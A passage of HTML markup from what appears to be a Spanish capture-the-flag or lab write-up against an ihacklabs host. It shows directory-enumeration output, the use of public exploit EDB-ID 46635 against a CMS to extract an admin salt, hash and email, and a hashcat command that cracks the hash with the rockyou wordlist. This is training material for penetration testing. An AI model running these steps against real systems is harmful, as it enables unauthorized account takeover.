style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">200</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">] http:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com/manual/es/stopping.html (HTML document)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">file</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> found: </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">200</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">] http:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com/manual/es/install.html (HTML document)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">file</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> found: </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">200</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">] http:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com/manual/es/mpm.html (HTML document)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">file</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> found: </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">200</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">] http:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com/manual/es/filter.html (HTML document)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">file</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> found: </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">200</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">] http:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com/manual/es/handler.html (HTML document)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">file</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> found: </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">200</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">] http:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com/manual/es/getting-started.html (HTML document)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">file</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> found: </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">…</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">200</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">] http:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com/manual/es/expr.html (HTML document)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">file</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> found: </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">200</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">] http:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com/manual/es/bind.html (HTML document)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">file</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> found: </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">index</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.html</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">...</span></p></td></tr></tbody></table></div><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">El exploit del CMS está disponible en </span><a href="https://www.exploit-db.com/exploits/46635" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">EDB-ID 46635</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> publicado el 02/04/2019. Nos descargamos el </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">exploit</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> y lo ejecutamos contra el servicio CMS obteniendo las credenciales de admin con </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">hashcat</span></p><br /><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody><tr style="height: 0pt;"><td style="background-color: #333333; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[+] Salt for password found: da0834c2d528bc22</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[+] Username found: admin</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[+] Email found: admin@mccd.es</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[*] Try: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">91</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">f237f9a5e2d049b5d948d8a097871c</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">hashcat -m </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">20</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">91</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">f237f9a5e2d049b5d948d8a097871c:da0834c2d528bc22 /usr/share/wordlists/rockyou.txt -o output.txt --force</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">hashcat (v5</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.1.0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) starting…</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">...</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Dictionary cache built:</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">* Filename..: /usr/share/wordlists/rockyou.txt</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">* Passwords.: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">14344392</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">* Bytes.....: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">139921507</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">* Keyspace..: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">14344385</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">* Runtime...: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">4</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> secs</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">... </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Session..........: hashcat</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Status...........: Cracked</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Hash.Type........: md5($salt.$pass)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Hash.Target......: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">91</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">f237f9a5e2d049b5d948d8a097871c:da0834c2d528bc22</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Time.Started.....: Sun Jan </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">12</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">01</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">49</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">28</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2020</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> (</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> sec)</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Time.Estimated...: Sun Jan </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">12</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">01</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: 